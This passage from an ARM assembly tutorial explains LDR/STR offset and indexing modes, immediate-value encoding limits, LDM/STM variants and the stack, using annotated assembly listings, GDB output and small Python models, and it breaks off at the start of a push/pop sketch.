      • Addressing mode: Post-indexed

    First basic example

    Generally, LDR is used to load something from memory into a register, and STR is used to store something from a register to a memory address.

    LDR R2, [R0]   @ [R0] - origin address is the value found in R0.
    STR R2, [R1]   @ [R1] - destination address is the value found in R1.

    LDR operation: loads the value at the address found in R0 to the destination register R2.

    STR operation: stores the value found in R2 to the memory address found in R1.

     

    This is what it would look like in a functional assembly program:

    .data          /* the .data section is dynamically created and its addresses cannot be easily predicted */
    var1: .word 3  /* variable 1 in memory */
    var2: .word 4  /* variable 2 in memory */
    
    .text          /* start of the text (code) section */ 
    .global _start
    
    _start:
        ldr r0, adr_var1  @ load the memory address of var1 via label adr_var1 into R0 
        ldr r1, adr_var2  @ load the memory address of var2 via label adr_var2 into R1 
        ldr r2, [r0]      @ load the value (0x03) at memory address found in R0 to register R2  
        str r2, [r1]      @ store the value found in R2 (0x03) to the memory address found in R1 
        bkpt             
    
    adr_var1: .word var1  /* address to var1 stored here */
    adr_var2: .word var2  /* address to var2 stored here */

    At the bottom we have our Literal Pool (a memory area in the same code section to store constants, strings, or offsets that others can reference in a position-independent manner) where we store the memory addresses of var1 and var2 (defined in the data section at the top) using the labels adr_var1 and adr_var2. The first LDR loads the address of var1 into register R0. The second LDR does the same for var2 and loads it to R1. Then we load the value stored at the memory address found in R0 to R2, and store the value found in R2 to the memory address found in R1.

    When we load something into a register, the brackets ([ ]) mean: the value found in the register between these brackets is a memory address we want to load something from.

    When we store something to a memory location, the brackets ([ ]) mean: the value found in the register between these brackets is a memory address we want to store something to.

    This sounds more complicated than it actually is, so here is a visual representation of what’s going on with the memory and the registers when executing the code above in a debugger:

    Let’s look at the same code in a debugger.

    gef> disassemble _start
    Dump of assembler code for function _start:
     0x00008074 <+0>:      ldr  r0, [pc, #12]   ; 0x8088 <adr_var1>
     0x00008078 <+4>:      ldr  r1, [pc, #12]   ; 0x808c <adr_var2>
     0x0000807c <+8>:      ldr  r2, [r0]
     0x00008080 <+12>:     str  r2, [r1]
     0x00008084 <+16>:     bx   lr
    End of assembler dump.

    The labels we specified with the first two LDR operations changed to [pc, #12]. This is called PC-relative addressing. Because we used labels, the assembler calculated the location of our values specified in the Literal Pool (PC+12). You can either calculate the location yourself using this exact approach, or you can use labels like we did previously. The only difference is that instead of using labels, you need to count the exact position of your value in the Literal Pool. In this case, it is 3 hops (4+4+4=12) away from the effective PC position. More about PC-relative addressing later in this chapter.

    Side note: In case you forgot why the effective PC is located two instructions ahead of the current one, [… During execution, PC stores the address of the current instruction plus 8 (two ARM instructions) in ARM state, and the current instruction plus 4 (two Thumb instructions) in Thumb state. This is different from x86 where PC always points to the next instruction to be executed…].
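The PC-relative arithmetic from the disassembly above can be checked with a tiny Python sketch. The function names are made up for illustration, and the Thumb case is simplified (it ignores the word alignment that Thumb applies to the PC for literal loads).

```python
def effective_pc(instr_addr, thumb=False):
    # the PC reads as the current instruction address + 8 (ARM) or + 4 (Thumb)
    return instr_addr + (4 if thumb else 8)

def pc_relative_target(instr_addr, offset, thumb=False):
    return effective_pc(instr_addr, thumb) + offset

print(hex(pc_relative_target(0x8074, 12)))  # first LDR  -> adr_var1
print(hex(pc_relative_target(0x8078, 12)))  # second LDR -> adr_var2
```

Both results match the addresses GDB prints next to the two LDR instructions (0x8088 and 0x808c).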

    1. Offset form: Immediate value as the offset

    STR    Ra, [Rb, imm]
    LDR    Ra, [Rc, imm]

    Here we use an immediate (integer) as an offset. This value is added to or subtracted from the base register (R1 in the example below) to access data at an offset known at compile time.

    .data
    var1: .word 3
    var2: .word 4
    
    .text
    .global _start
    
    _start:
        ldr r0, adr_var1  @ load the memory address of var1 via label adr_var1 into R0
        ldr r1, adr_var2  @ load the memory address of var2 via label adr_var2 into R1
        ldr r2, [r0]      @ load the value (0x03) at memory address found in R0 to register R2 
        str r2, [r1, #2]  @ address mode: offset. Store the value found in R2 (0x03) to the memory address found in R1 plus 2. Base register (R1) unmodified. 
        str r2, [r1, #4]! @ address mode: pre-indexed. Store the value found in R2 (0x03) to the memory address found in R1 plus 4. Base register (R1) modified: R1 = R1+4 
        ldr r3, [r1], #4  @ address mode: post-indexed. Load the value at memory address found in R1 to register R3 (not R1 plus 4). Base register (R1) modified: R1 = R1+4 
        bkpt
    
    adr_var1: .word var1
    adr_var2: .word var2

    Let’s call this program ldr.s, assemble and link it, and run it in GDB to see what happens.

    $ as ldr.s -o ldr.o
    $ ld ldr.o -o ldr
    $ gdb ldr

    In GDB (with gef) we set a break point at _start and run the program.

    gef> break _start
    gef> run
    ...
    gef> nexti 3     /* to run the next 3 instructions */

    The registers on my system are now filled with the following values (keep in mind that these addresses might be different on your system):

    $r0 : 0x00010098 -> 0x00000003
    $r1 : 0x0001009c -> 0x00000004
    $r2 : 0x00000003
    $r3 : 0x00000000
    $r4 : 0x00000000
    $r5 : 0x00000000
    $r6 : 0x00000000
    $r7 : 0x00000000
    $r8 : 0x00000000
    $r9 : 0x00000000
    $r10 : 0x00000000
    $r11 : 0x00000000
    $r12 : 0x00000000
    $sp : 0xbefff7e0 -> 0x00000001
    $lr : 0x00000000
    $pc : 0x00010080 -> <_start+12> str r2, [r1]
    $cpsr : 0x00000010

    The next instruction that will be executed is a STR operation with the offset address mode. It will store the value from R2 (0x00000003) to the memory address specified in R1 (0x0001009c) + the offset (#2) = 0x1009e.

    gef> nexti
    gef> x/w 0x1009e 
    0x1009e <var2+2>: 0x3

    The next STR operation uses the pre-indexed address mode. You can recognize this mode by the exclamation mark (!). The only difference is that the base register will be updated with the final memory address in which the value of R2 will be stored. This means, we store the value found in R2 (0x3) to the memory address specified in R1 (0x1009c) + the offset (#4) = 0x100A0, and update R1 with this exact address.

    gef> nexti
    gef> x/w 0x100A0
    0x100a0: 0x3
    gef> info register r1
    r1     0x100a0     65696

    The last LDR operation uses the post-indexed address mode. This means that the base register (R1) is used as the final address, then updated with the offset calculated with R1+4. In other words, it takes the address found in R1 (not R1+4), which is 0x100A0, loads the value stored there into R3, then updates R1 to R1 (0x100A0) + offset (#4) = 0x100a4.

    gef> info register r1
    r1      0x100a4   65700
    gef> info register r3
    r3      0x3       3
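If it helps, the three address modes can be replayed in Python with a toy memory. This is a rough sketch, not an emulator: the `memory` byte array, the helper functions and the `regs` dictionary are all invented for this example, and the base address is simply the one from the GDB session above.

```python
import struct

BASE = 0x10098             # address of var1 in the GDB session above
memory = bytearray(0x20)   # toy memory; index 0 stands for address BASE
struct.pack_into("<II", memory, 0, 3, 4)   # var1 = 3, var2 = 4

def store_word(addr, value):
    struct.pack_into("<I", memory, addr - BASE, value)

def load_word(addr):
    return struct.unpack_from("<I", memory, addr - BASE)[0]

regs = {"r0": BASE, "r1": BASE + 4, "r2": 0, "r3": 0}

regs["r2"] = load_word(regs["r0"])        # ldr r2, [r0]

store_word(regs["r1"] + 2, regs["r2"])    # str r2, [r1, #2]   offset: R1 untouched

regs["r1"] += 4                           # str r2, [r1, #4]!  pre-indexed: update R1 first
store_word(regs["r1"], regs["r2"])

regs["r3"] = load_word(regs["r1"])        # ldr r3, [r1], #4   post-indexed: use R1, then update
regs["r1"] += 4

print(hex(regs["r1"]), hex(regs["r3"]))
```

The final values of R1 and R3 agree with what GDB reported: R1 ends at 0x100a4 and R3 holds 0x3.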

    Here is an abstract illustration of what’s happening:

    2. Offset form: Register as the offset.

    STR    Ra, [Rb, Rc]
    LDR    Ra, [Rb, Rc]

    This offset form uses a register as an offset. An example usage of this offset form is when your code wants to access an array where the index is computed at run-time.

    .data
    var1: .word 3
    var2: .word 4
    
    .text
    .global _start
    
    _start:
        ldr r0, adr_var1  @ load the memory address of var1 via label adr_var1 to R0 
        ldr r1, adr_var2  @ load the memory address of var2 via label adr_var2 to R1 
        ldr r2, [r0]      @ load the value (0x03) at memory address found in R0 to R2
        str r2, [r1, r2]  @ address mode: offset. Store the value found in R2 (0x03) to the memory address found in R1 with the offset R2 (0x03). Base register unmodified.   
        str r2, [r1, r2]! @ address mode: pre-indexed. Store value found in R2 (0x03) to the memory address found in R1 with the offset R2 (0x03). Base register modified: R1 = R1+R2. 
        ldr r3, [r1], r2  @ address mode: post-indexed. Load value at memory address found in R1 to register R3. Then modify base register: R1 = R1+R2.
        bx lr
    
    adr_var1: .word var1
    adr_var2: .word var2

    After executing the first STR operation with the offset address mode, the value of R2 (0x00000003) will be stored at memory address 0x0001009c + 0x00000003 = 0x0001009F.

    gef> x/w 0x0001009F
     0x1009f <var2+3>: 0x00000003

    The second STR operation with the pre-indexed address mode will do the same, with the difference that it will update the base register (R1) with the calculated memory address (R1+R2).

    gef> info register r1
     r1     0x1009f      65695

    The last LDR operation uses the post-indexed address mode and loads the value at the memory address found in R1 into the register R3, then updates the base register R1 (R1+R2 = 0x1009f + 0x3 = 0x100a2).

    gef> info register r1
     r1      0x100a2     65698
    gef> info register r3
     r3      0x3       3

    3. Offset form: Scaled register as the offset

    LDR    Ra, [Rb, Rc, <shifter>]
    STR    Ra, [Rb, Rc, <shifter>]

    The third offset form has a scaled register as the offset. In this case, Rb is the base register and Rc is a register holding the offset value, which is shifted left or right (<shifter>) to scale it. This means that the barrel shifter is used to scale the offset. An example usage of this offset form would be a loop that iterates over an array. Here is a simple example you can run in GDB:

    .data
    var1: .word 3
    var2: .word 4
    
    .text
    .global _start
    
    _start:
        ldr r0, adr_var1         @ load the memory address of var1 via label adr_var1 to R0
        ldr r1, adr_var2         @ load the memory address of var2 via label adr_var2 to R1
        ldr r2, [r0]             @ load the value (0x03) at memory address found in R0 to R2
        str r2, [r1, r2, LSL#2]  @ address mode: offset. Store the value found in R2 (0x03) to the memory address found in R1 with the offset R2 left-shifted by 2. Base register (R1) unmodified.
        str r2, [r1, r2, LSL#2]! @ address mode: pre-indexed. Store the value found in R2 (0x03) to the memory address found in R1 with the offset R2 left-shifted by 2. Base register modified: R1 = R1 + R2<<2
        ldr r3, [r1], r2, LSL#2  @ address mode: post-indexed. Load value at memory address found in R1 to the register R3. Then modify base register: R1 = R1 + R2<<2
        bkpt
    
    adr_var1: .word var1
    adr_var2: .word var2

    The first STR operation uses the offset address mode and stores the value found in R2 at the memory location calculated from [r1, r2, LSL#2], which means that it takes the value in R1 as a base (in this case, R1 contains the memory address of var2), then it takes the value in R2 (0x3), and shifts it left by 2. The picture below is an attempt to visualize how the memory location is calculated with [r1, r2, LSL#2].

    The second STR operation uses the pre-indexed address mode. This means it performs the same action as the previous operation, with the difference that it updates the base register R1 with the calculated memory address afterwards. In other words, it will first store the value found in R2 (0x3) at the memory address R1 (0x1009c) + the offset left shifted by #2 (0x03 LSL#2 = 0xC) = 0x100a8, and update R1 with 0x100a8.

    gef> info register r1
    r1      0x100a8      65704

    The last LDR operation uses the post-indexed address mode. This means, it loads the value at the memory address found in R1 (0x100a8) into register R3, then updates the base register R1 with the value calculated with r2, LSL#2. In other words, R1 gets updated with the value R1 (0x100a8) + the offset R2 (0x3) left shifted by #2 (0xC) = 0x100b4.

    gef> info register r1
    r1      0x100b4      65716
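The address arithmetic for the scaled register form is easy to verify by hand, or with a short Python sketch like the one below. The helper name is hypothetical; the register values are the ones from the walkthrough above.

```python
def scaled_offset_address(base, index, shift):
    """Address used by [Rb, Rc, LSL #shift]: base + (index << shift)."""
    return (base + (index << shift)) & 0xFFFFFFFF

r1, r2 = 0x1009C, 0x3

# str r2, [r1, r2, LSL#2]   -> offset mode, R1 unchanged
offset_addr = scaled_offset_address(r1, r2, 2)

# str r2, [r1, r2, LSL#2]!  -> pre-indexed, R1 takes the computed address
r1 = scaled_offset_address(r1, r2, 2)
pre_indexed_r1 = r1

# ldr r3, [r1], r2, LSL#2   -> post-indexed, load from R1 first, then update it
load_addr = r1
r1 = scaled_offset_address(r1, r2, 2)

print(hex(offset_addr), hex(pre_indexed_r1), hex(load_addr), hex(r1))
```

Shifting the index left by 2 multiplies it by 4, which is the size of a word. That is why this form is a natural fit for indexing into an array of 32-bit values.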

    Summary

    Remember the three offset forms in LDR/STR:

    1. offset form uses an immediate as offset
      • ldr   r3, [r1, #4]
    2. offset form uses a register as offset
      • ldr   r3, [r1, r2]
    3. offset form uses a scaled register as offset
      • ldr   r3, [r1, r2, LSL#2]

    How to remember the different address modes in LDR/STR:

    • If there is a !, it’s the pre-indexed (prefix) address mode
      • ldr   r3, [r1, #4]!
      • ldr   r3, [r1, r2]!
      • ldr   r3, [r1, r2, LSL#2]!
    • If the base register is in brackets by itself, it’s the post-indexed (postfix) address mode
      • ldr   r3, [r1], #4
      • ldr   r3, [r1], r2
      • ldr   r3, [r1], r2, LSL#2
    • Anything else is offset address mode.
      • ldr   r3, [r1, #4]
      • ldr   r3, [r1, r2]
      • ldr   r3, [r1, r2, LSL#2]

    LDR FOR PC-RELATIVE ADDRESSING

    LDR is not only used to load data from memory into a register. Sometimes you will see syntax like this:

    .section .text
    .global _start
    
    _start:
       ldr r0, =jump        /* load the address of the function label jump into R0 */
       ldr r1, =0x68DB00AD  /* load the value 0x68DB00AD into R1 */
    jump:
       ldr r2, =511         /* load the value 511 into R2 */ 
       bkpt

    These instructions are technically called pseudo-instructions. We can use this syntax to reference data in the literal pool. The literal pool is a memory area in the same section (because the literal pool is part of the code) to store constants, strings, or offsets. In the example above we use these pseudo-instructions to reference an offset to a function, and to move a 32-bit constant into a register in one instruction. The reason why we sometimes need to use this syntax to move a 32-bit constant into a register in one instruction is that ARM can only load an 8-bit value in one go. What? To understand why, you need to know how immediate values are being handled on ARM.

    USING IMMEDIATE VALUES ON ARM

    Loading immediate values in a register on ARM is not as straightforward as it is on x86. There are restrictions on which immediate values you can use. What these restrictions are and how to deal with them isn’t the most exciting part of ARM assembly, but bear with me, this is just for your understanding and there are tricks you can use to bypass these restrictions (hint: LDR).

    We know that each ARM instruction is 32 bits long, and all instructions are conditional. There are 16 condition codes which we can use and one condition code takes up 4 bits of the instruction. Then we need 4 bits for the destination register, 4 bits for the first operand register, and 1 bit for the set-status flag, plus an assorted number of bits for other matters like the actual opcodes. The point here is that after assigning bits to instruction-type, registers, and other fields, there are only 12 bits left for immediate values, which will only allow for 4096 different values.

    This means that an ARM instruction is only able to use a limited range of immediate values with MOV directly. If a number can’t be used directly, it must be split into parts and pieced together from multiple smaller numbers.

    But there is more. Instead of taking the 12 bits for a single integer, those 12 bits are split into an 8-bit number (n), which can hold any value in the range of 0-255, and a 4-bit rotation field (r), which encodes a right rotate in steps of 2 between 0 and 30. This means that the full immediate value v is given by the formula: v = n ror 2*r. In other words, the only valid immediate values are rotated bytes (values that can be reduced to a byte rotated by an even number).

    Here are some examples of valid and invalid immediate values:

    Valid values:
    #256        // 1 ror 24 --> 256
    #384        // 6 ror 26 --> 384
    #484        // 121 ror 30 --> 484
    #16384      // 1 ror 18 --> 16384
    #2030043136 // 121 ror 8 --> 2030043136
    #0x06000000 // 6 ror 8 --> 100663296 (0x06000000 in hex)
    
    Invalid values:
    #370        // 185 ror 31 --> 31 is not in range (0 – 30)
    #511        // 1 1111 1111 --> bit-pattern can’t fit into one byte
    #0x06010000 // 1 1000 0001.. --> bit-pattern can’t fit into one byte
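The rule v = n ror 2*r can be turned into a short Python check. This is my own sketch of the rule as described above (the function names are made up for illustration): it tries every even rotation and reports the first 8-bit value n that reproduces the constant.

```python
def rol32(value, amount):
    """Rotate a 32-bit value left by `amount` bits."""
    amount %= 32
    value &= 0xFFFFFFFF
    return ((value << amount) | (value >> (32 - amount))) & 0xFFFFFFFF

def encode_immediate(value):
    """Return (n, rotation) with value == n ror rotation, or None if impossible."""
    for rotation in range(0, 32, 2):
        n = rol32(value, rotation)     # undo a rotate-right by `rotation`
        if n <= 0xFF:
            return n, rotation
    return None

for v in (256, 384, 484, 16384, 0x06000000, 370, 511, 0x06010000):
    print(v, encode_immediate(v))
```

Running it over the examples above gives a (n, rotation) pair for every valid value and None for 370, 511 and 0x06010000.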

    This has the consequence that it is not possible to load a full 32-bit address in one go. We can bypass this restriction by using one of the following two options:

    1. Construct a larger value out of smaller parts
      1. Instead of using MOV  r0, #511
      2. Split 511 into two parts: MOV r0, #256, and ADD r0, #255
    2. Use a load construct ‘ldr r1,=value’ which the assembler will happily convert into a MOV, or a PC-relative load if that is not possible.
      1. LDR r1, =511
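To illustrate the second option, here is a hedged Python sketch of the decision the assembler has to make for `ldr rX, =value`. It is a simplification based on my reading of the GNU assembler documentation, which says a MOV or MVN is used when the constant can be generated that way and a literal pool load otherwise; the function names and the output strings are invented for this example, and the real literal pool offset is left as a placeholder.

```python
def is_rotated_byte(value):
    """True if value is an 8-bit number rotated right by an even amount."""
    value &= 0xFFFFFFFF
    for rotation in range(0, 32, 2):
        rotated = ((value << rotation) | (value >> (32 - rotation))) & 0xFFFFFFFF
        if rotated <= 0xFF:
            return True
    return False

def expand_ldr_pseudo(reg, value):
    """Sketch of how `ldr reg, =value` might be expanded by the assembler."""
    if is_rotated_byte(value):
        return f"mov {reg}, #{value:#x}"
    if is_rotated_byte(~value):
        return f"mvn {reg}, #{~value & 0xFFFFFFFF:#x}"
    return f"ldr {reg}, [pc, #<offset of literal {value:#x}>]"

print(expand_ldr_pseudo("r1", 256))
print(expand_ldr_pseudo("r1", 511))
```

So 256 can become a plain MOV, while 511 has to be fetched from the literal pool with a PC-relative load.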

    If you try to load an invalid immediate value the assembler will complain and output an error saying: Error: invalid constant. If you encounter this error, you now know what it means and what to do about it.
    Let’s say you want to load #511 into R0.

    .section .text
    .global _start
    
    _start:
        mov     r0, #511
        bkpt

    If you try to assemble this code, the assembler will throw an error:

    azeria@labs:~$ as test.s -o test.o
    test.s: Assembler messages:
    test.s:5: Error: invalid constant (1ff) after fixup

    You need to either split 511 into multiple parts or use LDR as I described before.

    .section .text
    .global _start
    
    _start:
     mov r0, #256   /* 1 ror 24 = 256, so it's valid */
     add r0, #255   /* 255 ror 0 = 255, valid. r0 = 256 + 255 = 511 */
     ldr r1, =511   /* load 511 from the literal pool using LDR */
     bkpt
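The splitting approach can also be automated. The following Python sketch is just one possible way to do it, not something the assembler does for you: it greedily carves the constant into 8-bit chunks that start at an even bit position, so every chunk is a valid immediate on its own. The function names are hypothetical.

```python
def split_into_immediates(value):
    """Split a 32-bit constant into chunks that are each a valid ARM immediate."""
    value &= 0xFFFFFFFF
    parts = []
    while value:
        low = (value & -value).bit_length() - 1   # index of the lowest set bit
        low -= low % 2                            # rotations come in steps of 2
        chunk = value & ((0xFF << low) & 0xFFFFFFFF)
        parts.append(chunk)
        value &= ~chunk
    return parts

def as_instructions(reg, value):
    parts = sorted(split_into_immediates(value), reverse=True) or [0]
    lines = [f"mov {reg}, #{parts[0]}"]
    lines += [f"add {reg}, {reg}, #{p}" for p in parts[1:]]
    return lines

print(as_instructions("r0", 511))
```

For 511 this produces the same MOV #256 / ADD #255 pair as the listing above. Larger constants simply need more ADD instructions, at which point the LDR approach is usually the shorter one.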

    If you need to figure out if a certain number can be used as a valid immediate value, you don’t need to calculate it yourself. You can use my little python script called rotator.py which takes your number as an input and tells you if it can be used as a valid immediate number.

    azeria@labs:~$ python rotator.py
    Enter the value you want to check: 511
    
    Sorry, 511 cannot be used as an immediate number and has to be split.
    
    azeria@labs:~$ python rotator.py
    Enter the value you want to check: 256
    
    The number 256 can be used as a valid immediate number.
    1 ror 24 --> 256

    LOAD/STORE MULTIPLE

    Sometimes it is more efficient to load (or store) multiple values at once. For that purpose we use LDM (load multiple) and STM (store multiple). These instructions have variations which basically differ only by the way the initial address is accessed. This is the code we will use in this section. We will go through each instruction step by step.

    .data
    
    array_buff:
     .word 0x00000000             /* array_buff[0] */
     .word 0x00000000             /* array_buff[1] */
     .word 0x00000000             /* array_buff[2]. This element has a relative address of array_buff+8 */
     .word 0x00000000             /* array_buff[3] */
     .word 0x00000000             /* array_buff[4] */
    
    .text
    .global _start
    
    _start:
     adr r0, words+12             /* address of words[3] -> r0 */
     ldr r1, array_buff_bridge    /* address of array_buff[0] -> r1 */
     ldr r2, array_buff_bridge+4  /* address of array_buff[2] -> r2 */
     ldm r0, {r4,r5}              /* words[3] -> r4 = 0x03; words[4] -> r5 = 0x04 */
     stm r1, {r4,r5}              /* r4 -> array_buff[0] = 0x03; r5 -> array_buff[1] = 0x04 */
     ldmia r0, {r4-r6}            /* words[3] -> r4 = 0x03, words[4] -> r5 = 0x04; words[5] -> r6 = 0x05; */
     stmia r1, {r4-r6}            /* r4 -> array_buff[0] = 0x03; r5 -> array_buff[1] = 0x04; r6 -> array_buff[2] = 0x05 */
     ldmib r0, {r4-r6}            /* words[4] -> r4 = 0x04; words[5] -> r5 = 0x05; words[6] -> r6 = 0x06 */
     stmib r1, {r4-r6}            /* r4 -> array_buff[1] = 0x04; r5 -> array_buff[2] = 0x05; r6 -> array_buff[3] = 0x06 */
     ldmda r0, {r4-r6}            /* words[3] -> r6 = 0x03; words[2] -> r5 = 0x02; words[1] -> r4 = 0x01 */
     ldmdb r0, {r4-r6}            /* words[2] -> r6 = 0x02; words[1] -> r5 = 0x01; words[0] -> r4 = 0x00 */
     stmda r2, {r4-r6}            /* r6 -> array_buff[2] = 0x02; r5 -> array_buff[1] = 0x01; r4 -> array_buff[0] = 0x00 */
     stmdb r2, {r4-r5}            /* r5 -> array_buff[1] = 0x01; r4 -> array_buff[0] = 0x00; */
     bx lr
    
    words:
     .word 0x00000000             /* words[0] */
     .word 0x00000001             /* words[1] */
     .word 0x00000002             /* words[2] */
     .word 0x00000003             /* words[3] */
     .word 0x00000004             /* words[4] */
     .word 0x00000005             /* words[5] */
     .word 0x00000006             /* words[6] */
    
    array_buff_bridge:
     .word array_buff             /* address of array_buff, or in other words - array_buff[0] */
     .word array_buff+8           /* address of array_buff[2] */

    Before we start, keep in mind that a .word refers to a data (memory) block of 32 bits = 4 bytes. This is important for understanding the offsetting. The program consists of a .data section where we allocate an empty array (array_buff) with 5 elements. We will use this as a writable memory location to STORE data. The .text section contains our code with the memory operation instructions and a read-only data pool containing two labels: one for an array with 7 elements, another for “bridging” the .text and .data sections so that we can access the array_buff residing in the .data section.

    adr r0, words+12             /* address of words[3] -> r0 */

    We use the ADR instruction (lazy approach) to get the address of the 4th element (words[3]) into R0. We point to the middle of the words array because we will be operating forwards and backwards from there.

    gef> break _start 
    gef> run
    gef> nexti

    R0 now contains the address of words[3], which in this case is 0x80B8. This means our array starts at the address of words[0]: 0x80AC (0x80B8 – 0xC).

    gef> x/7w 0x00080AC
    0x80ac <words>: 0x00000000 0x00000001 0x00000002 0x00000003
    0x80bc <words+16>: 0x00000004 0x00000005 0x00000006

    We prepare R1 and R2 with the addresses of the first (array_buff[0]) and third (array_buff[2]) elements of the array_buff array. Once the addresses are obtained, we can start operating on them.

    ldr r1, array_buff_bridge    /* address of array_buff[0] -> r1 */
    ldr r2, array_buff_bridge+4  /* address of array_buff[2] -> r2 */

    After executing the two instructions above, R1 and R2 contain the addresses of array_buff[0] and array_buff[2].

    gef> info register r1 r2
    r1      0x100d0     65744
    r2      0x100d8     65752

    The next instruction uses LDM to load two word values from the memory pointed to by R0. Because we made R0 point to the words[3] element earlier, the words[3] value goes to R4 and the words[4] value goes to R5.

    ldm r0, {r4,r5}              /* words[3] -> r4 = 0x03; words[4] -> r5 = 0x04 */

    We loaded multiple (2 data blocks) with one command, which set R4 = 0x00000003 and R5 = 0x00000004.

    gef> info registers r4 r5
    r4      0x3      3
    r5      0x4      4

    So far so good. Now let’s perform the STM instruction to store multiple values to memory. The STM instruction in our code takes values (0x3 and 0x4) from registers R4 and R5 and stores these values to a memory location specified by R1. We previously set R1 to point to the first array_buff element, so after this operation array_buff[0] = 0x00000003 and array_buff[1] = 0x00000004. If not specified otherwise, LDM and STM operate in steps of one word (32 bits = 4 bytes).

    stm r1, {r4,r5}              /* r4 -> array_buff[0] = 0x03; r5 -> array_buff[1] = 0x04 */

    The values 0x3 and 0x4 should now be stored at the memory addresses 0x100D0 and 0x100D4. The following command inspects two words of memory at the address 0x000100D0.

    gef> x/2w 0x000100D0
    0x100d0 <array_buff>:  0x3   0x4

    As mentioned before, LDM and STM have variations. The type of variation is defined by the suffix of the instruction. Suffixes used in the example are: -IA (increment after), -IB (increment before), -DA (decrement after), -DB (decrement before). These variations differ in how they access the memory specified by the first operand (the register storing the source or destination address). In practice, LDM is the same as LDMIA, which means that the address for the next element to be loaded is increased after each load. In this way we get a sequential (forward) data loading from the memory address specified by the first operand (register storing the source address).

    ldmia r0, {r4-r6} /* words[3] -> r4 = 0x03, words[4] -> r5 = 0x04; words[5] -> r6 = 0x05; */ 
    stmia r1, {r4-r6} /* r4 -> array_buff[0] = 0x03; r5 -> array_buff[1] = 0x04; r6 -> array_buff[2] = 0x05 */

    After executing the two instructions above, the registers R4-R6 and the memory addresses 0x000100D0, 0x000100D4, and 0x000100D8 contain the values 0x3, 0x4, and 0x5.

    gef> info registers r4 r5 r6
    r4     0x3     3
    r5     0x4     4
    r6     0x5     5
    gef> x/3w 0x000100D0
    0x100d0 <array_buff>: 0x00000003  0x00000004  0x00000005

    The LDMIB instruction first increases the source address by 4 bytes (one word value) and then performs the first load. In this way we still have a sequential (forward) loading of data, but the first element is with a 4 byte offset from the source address. That’s why in our example the first element to be loaded from the memory into the R4 by LDMIB instruction is 0x00000004 (the words[4]) and not the 0x00000003 (words[3]) as pointed by the R0.

    ldmib r0, {r4-r6}            /* words[4] -> r4 = 0x04; words[5] -> r5 = 0x05; words[6] -> r6 = 0x06 */
    stmib r1, {r4-r6}            /* r4 -> array_buff[1] = 0x04; r5 -> array_buff[2] = 0x05; r6 -> array_buff[3] = 0x06 */

    After executing the two instructions above, the registers R4-R6 and the memory addresses 0x100D4, 0x100D8, and 0x100DC contain the values 0x4, 0x5, and 0x6.

    gef> x/3w 0x100D4
    0x100d4 <array_buff+4>: 0x00000004  0x00000005  0x00000006
    gef> info register r4 r5 r6
    r4     0x4    4
    r5     0x5    5
    r6     0x6    6

    When we use the LDMDA instruction everything starts to operate backwards. R0 points to words[3]. When loading starts we move backwards and load words[3], words[2] and words[1] into R6, R5 and R4. Yes, registers are also loaded backwards. So after the instruction finishes, R6 = 0x00000003, R5 = 0x00000002, R4 = 0x00000001. The logic here is that we move backwards because we Decrement the source address AFTER each load. The backward register loading happens because with every load we decrement the memory address and thus decrement the register number, to keep up with the logic that higher memory addresses relate to higher register numbers. Check out the LDMIA (or LDM) example: we loaded the lower register first because the source address was lower, and then loaded the higher register because the source address increased.

    Load multiple, decrement after:

    ldmda r0, {r4-r6} /* words[3] -> r6 = 0x03; words[2] -> r5 = 0x02; words[1] -> r4 = 0x01 */

    Registers R4, R5, and R6 after execution:

    gef> info register r4 r5 r6
    r4     0x1    1
    r5     0x2    2
    r6     0x3    3

    Load multiple, decrement before:

    ldmdb r0, {r4-r6} /* words[2] -> r6 = 0x02; words[1] -> r5 = 0x01; words[0] -> r4 = 0x00 */

    Registers R4, R5, and R6 after execution:

    gef> info register r4 r5 r6
    r4 0x0 0
    r5 0x1 1
    r6 0x2 2

    Store multiple, decrement after:

    stmda r2, {r4-r6} /* r6 -> array_buff[2] = 0x02; r5 -> array_buff[1] = 0x01; r4 -> array_buff[0] = 0x00 */

    Memory addresses of array_buff[2], array_buff[1], and array_buff[0] after execution:

    gef> x/3w 0x100D0
    0x100d0 <array_buff>: 0x00000000 0x00000001 0x00000002

    Store multiple, decrement before:

    stmdb r2, {r4-r5} /* r5 -> array_buff[1] = 0x01; r4 -> array_buff[0] = 0x00; */

    Memory addresses of array_buff[1] and array_buff[0] after execution:

    gef> x/2w 0x100D0
    0x100d0 <array_buff>: 0x00000000 0x00000001
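
The four variants differ only in which block of addresses they touch. The following Python sketch is not ARM code; it is a small model of the address arithmetic described above. It assumes 4-byte words, a made-up base address of 0x1000 for the words array (with words[i] == i), and hypothetical helper names (block_start, ldm). Registers are given as numbers, and the lowest-numbered register is paired with the lowest address.

```python
WORD = 4  # size of one ARM word in bytes

def block_start(base, count, mode):
    """Lowest address touched by an LDM/STM that transfers `count` registers."""
    if mode == "ia":                      # increment after
        return base
    if mode == "ib":                      # increment before
        return base + WORD
    if mode == "da":                      # decrement after
        return base - WORD * (count - 1)
    if mode == "db":                      # decrement before
        return base - WORD * count
    raise ValueError("unknown mode: " + mode)

def ldm(memory, base, regs, mode):
    """Model LDM<mode> base, {regs}; returns {register number: loaded value}."""
    start = block_start(base, len(regs), mode)
    # The lowest-numbered register is always paired with the lowest address.
    return {reg: memory[start + WORD * i] for i, reg in enumerate(sorted(regs))}

# Assumed layout: words[i] == i, stored at 0x1000 + 4 * i.
WORDS_BASE = 0x1000
memory = {WORDS_BASE + WORD * i: i for i in range(8)}
r0 = WORDS_BASE + WORD * 3                # r0 points to words[3]

for mode in ("ia", "ib", "da", "db"):
    print("ldm" + mode, ldm(memory, r0, [4, 5, 6], mode))
```

The printed register values should line up with the GDB output of the LDMIA, LDMIB, LDMDA and LDMDB examples.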

    PUSH AND POP

    There is a memory location within the process called the Stack. The Stack Pointer (SP) is a register which, under normal circumstances, always points to an address within the Stack’s memory region. Applications often use the Stack for temporary data storage. As mentioned before, ARM uses a Load/Store model for memory access, which means that the instructions LDR / STR or their derivatives (LDM.. / STM..) are used for memory operations. In x86, we use PUSH and POP to store data onto and load data from the Stack. In ARM, we can use these two instructions too.

    When we PUSH something onto the Full Descending stack the following happens:

    1. First, the address in SP gets DECREASED by 4.
    2. Second, information gets stored at the new address pointed to by SP.

    When we POP something off the stack, the following happens:

    1. The value at the current SP address is loaded into a certain register,
    2. Address in SP gets INCREASED by 4.
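
The two sequences above can be modelled in a few lines of Python. This is only a sketch of the Full Descending behaviour, not ARM code: the helper names push and pop, the dictionary used as memory, and the stack address are illustrative assumptions. For a register list with several registers, SP moves by 4 bytes per register, and the lowest-numbered register ends up at the lowest address.

```python
WORD = 4  # one stack slot is 4 bytes

def push(memory, sp, values):
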